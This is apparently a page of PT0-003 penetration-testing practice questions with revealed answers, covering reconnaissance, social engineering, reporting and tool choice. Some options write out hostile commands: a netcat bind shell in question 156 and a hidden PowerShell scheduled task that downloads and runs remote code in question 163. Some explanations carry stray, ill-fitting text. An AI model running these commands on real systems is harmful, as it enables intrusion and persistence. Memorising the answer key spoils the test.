πŸ”

PT0-003 β€” questions

Page 8 of 17 Β· 334 total questions.

Topic 1 Β· Question 143

Which of the following will reduce the possibility of introducing errors or bias in a penetration test report?

  • ASecure distribution
  • BPeer review (correct answer)
  • CUse AI
  • DGoal reprioritization
Reveal answer & explanation
Correct answer: B

The correct answer is B. Option B: Peer review

Topic 1 Β· Question 144

A penetration tester identifies the URL for an internal administration application while following DevOps team members on their commutes. Which of the following attacks did penetration tester most likely use?

  • AShoulder surfing (correct answer)
  • BDumpster diving
  • CSpear phishing
  • DTailgating
Reveal answer & explanation
Correct answer: A

The correct answer is A. Option A: Shoulder surfing

Topic 1 Β· Question 145

During an assessment, a penetration tester obtains access to an internal server and would like to perform further reconnaissance by capturing LLMNR traffic. Which of the following tools should the tester use?

  • ABurp Suite
  • BNetcat
  • CResponder (correct answer)
  • DNmap
Reveal answer & explanation
Correct answer: C

The correct answer is C. Option C: Responder

Topic 1 Β· Question 146

A penetration tester needs to obtain sensitive data from several executives who regularly work while commuting by train. Which of the following methods should the tester use for this task?

  • AShoulder surfing (correct answer)
  • BCredential harvesting
  • CBluetooth spamming
  • DMFA fatigue
Reveal answer & explanation
Correct answer: A

The correct answer is A. Option A: Shoulder surfing

Topic 1 Β· Question 147

While performing reconnaissance, a penetration tester attempts to identify publicly accessible ICS and IoT systems. Which of the following tools is most effective for this task?

  • AtheHarvester
  • BShodan (correct answer)
  • CAmass
  • DNmap
Reveal answer & explanation
Correct answer: B

The correct answer is B. Option B: Shodan

Topic 1 Β· Question 148

A penetration tester successfully gained access to manage resources and services within the company’s cloud environment. This was achieved by exploiting poorly secured administrative credentials that had extensive permissions across the network. Which of the following credentials was the tester able to obtain?

  • AIAM credentials (correct answer)
  • BSSH key for cloud instance
  • CCloud storage credentials
  • DTemporary security credentials (STS)
Reveal answer & explanation
Correct answer: A

The correct answer is A. Option A: IAM credentials This option keeps traffic private / properly secured as required.

Topic 1 Β· Question 149

Which of the following frameworks can be used to classify threats?

  • APTES
  • BSTRIDE (correct answer)
  • COSSTMM
  • DOCTAVE
Reveal answer & explanation
Correct answer: B

The correct answer is B. Option B: STRIDE

Topic 1 Β· Question 150

A penetration tester is enumerating a Linux system. The goal is to modify the following script to provide more comprehensive system information: #!/bin/bash ps aux >> linux enum.txt Which of the following lines would provide the most comprehensive enumeration of the system?

  • Acat /etc/passwd >> linux_enum.txtnetstat -tulr >> linux_enum.txtcat /etc/bash.bashrc >> linux_enum. txt (correct answer)
  • Bwhoami >> linux_enum.txtuname -a >> linux_enum.txtifconfig >> linux_enum.txt
  • Chostname >> linux_enum.txtecho $USER >> linux_enum.txtcurl ifconfig.me >> linux_enum.txt
  • Dlsof -i >> linux_enum.txtuname -a >> linux_enum.txtls /home/ >> linux_enum.txt
Reveal answer & explanation
Correct answer: A

The correct answer is A. Option A: cat /etc/passwd >> linux_enum.txtnetstat -tulr >> linux_enum.txtcat /etc/bash.bashrc >> linux_enum. txt

Topic 1 Β· Question 151

During an assessment, a penetration tester sends the following request: POST /services/v1/users/create HTTP/1.1 Host: target-application.com - Content-Type: application/json - Content-Length: [dynamic] Authorization: Bearer [FUZZE] Which of the following attacks is the penetration tester performing?

  • ADirectory traversal
  • BAPI abuse (correct answer)
  • CServer-side request forgery
  • DPrivilege escalation
Reveal answer & explanation
Correct answer: B

The correct answer is B. Option B: API abuse

Topic 1 Β· Question 152

During a penetration test, the tester identifies several unused services that are listening on all targeted internal laptops: Which of the following technical controls should the tester recommend to reduce the risk of compromise?

Exhibit 1 for question 152
  • AMultifactor authentication
  • BPatch management
  • CSystem hardening (correct answer)
  • DNetwork segmentation
Reveal answer & explanation
Correct answer: C

The correct answer is C. Option C: System hardening

Topic 1 Β· Question 153

Which of the following elements of a penetration test report can be used to most effectively prioritize the remediation efforts for all the findings?

  • AMethodology
  • BDetailed findings list
  • CRisk score (correct answer)
  • DExecutive summary
Reveal answer & explanation
Correct answer: C

The correct answer is C. Option C: Risk score

Topic 1 Β· Question 154

A penetration tester observes the following output from an Nmap command while attempting to troubleshoot connectivity to a Linux server. Which of the following is the most likely reason for the connectivity issue?

Exhibit 1 for question 154
  • AThe SSH service is running on a different port. (correct answer)
  • BThe SSH service is blocked by a firewall.
  • CThe SSH service requires certificate authentication.
  • DThe SSH service is not active.
Reveal answer & explanation
Correct answer: A

The correct answer is A. Option A: The SSH service is running on a different port.

Topic 1 Β· Question 155

Which of the following methods should a physical penetration tester employ to access a rarely used door that has electronic locking mechanisms?

  • ALock picking
  • BImpersonating
  • CJamming
  • DTailgating
  • EBypassing (correct answer)
Reveal answer & explanation
Correct answer: E

The correct answer is E. Option E: Bypassing

Topic 1 Β· Question 156

A penetration tester finds an un authenticated RCE vulnerability on a web server and wants to use it to enumerate other servers on the local network. The web server is behind a firewall that allows only an incoming connection to TCP ports 443 and 53 and unrestricted outbound TCP connections. The target web server is https://target.comptia.org. Which of the following should the tester use to perform the task with the fewest web requests?

  • Anc -e /bin/sh -lp 53 (correct answer)
  • B/bin/sh -c 'nc -l -p 443'
  • Cnc -e /bin/sh 53
  • D/bin/sh -c 'nc 443'
Reveal answer & explanation
Correct answer: A

The correct answer is A. Option A: nc -e /bin/sh -lp 53

Topic 1 Β· Question 157

With one day left to complete the testing phase of an engagement, a penetration tester obtains the following results from an Nmap scan: Which of the following tools should the tester use to quickly identify a potential attack path?

Exhibit 1 for question 157
  • Amsfvenom
  • BSearchSploit (correct answer)
  • Csqlmap
  • DBeEF
Reveal answer & explanation
Correct answer: B

The correct answer is B. Option B: SearchSploit

Topic 1 Β· Question 158

A tester is working on an engagement that has evasion and stealth requirements. Which of the following enumeration methods is the least likely to be detected by the IDS?

  • Acurl https://api.shodan.io/shodan/host/search?key=&query=hostname: (correct answer)
  • Bproxychains nmap -sV -T2
  • Cfor i in ; do curl -k $i; done
  • Dnmap -sV -T2
Reveal answer & explanation
Correct answer: A

The correct answer is A. Option A: curl https://api.shodan.io/shodan/host/search?key=&query=hostname:

Topic 1 Β· Question 159

A penetration tester needs to confirm the version number of a client’s web-application server. Which of the following techniques should the penetration tester use?

  • ASSL certificate inspection
  • BURL spidering
  • CBanner grabbing (correct answer)
  • DDirectory brute forcing
Reveal answer & explanation
Correct answer: C

The correct answer is C. Option C: Banner grabbing

Topic 1 Β· Question 160

A penetration tester wants to identify all the TLS versions used in a web service in order to determine potentially insecure versions. Which of the following commands should the tester use?

  • Anmap --script ssl-enum-ciphers (correct answer)
  • Bcurl --tls-max 3
  • Cwget --server-response
  • Dopenssl version
Reveal answer & explanation
Correct answer: A

The correct answer is A. Option A: nmap --script ssl-enum-ciphers This option keeps traffic private / properly secured as required.

Topic 1 Β· Question 161

Eight months after the completion of a penetration test, the client emails the penetration tester to debate the validity of several findings. The findings are now posing a hindrance to compliance certifications. Which of the following would most likely assist the penetration tester with de-escalation?

  • ATesting methodology
  • BTerms of use
  • CBusiness impact analysis
  • DClient acceptance (correct answer)
Reveal answer & explanation
Correct answer: D

The correct answer is D. Option D: Client acceptance

Topic 1 Β· Question 163

A tester obtained access to a computer using a SMB exploit and now has a shell access into the target computer. The tester runs the following on the obtained shell: schtask /create /tn Updates /tr "C:\windows\syswow64\Windows\WindowsPowershell\v1.0\powershell.exe hidden -NoLogo -NoInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring('http://10.10.1.2/asd')))'" /sc onlogon /ru System Which of the following does this action accomplish?

  • AUpgrades the shell performing a privilege escalation activity
  • BUses the Windows Update service to move the shell connection and avoid detection
  • CMaintains access into the compromised computer (correct answer)
  • DForwards all the communication from the compromised host to the host 10.10.1.2
Reveal answer & explanation
Correct answer: C

The correct answer is C. Option C: Maintains access into the compromised computer

Showing questions 141–160 of 334 Β· Page 8 of 17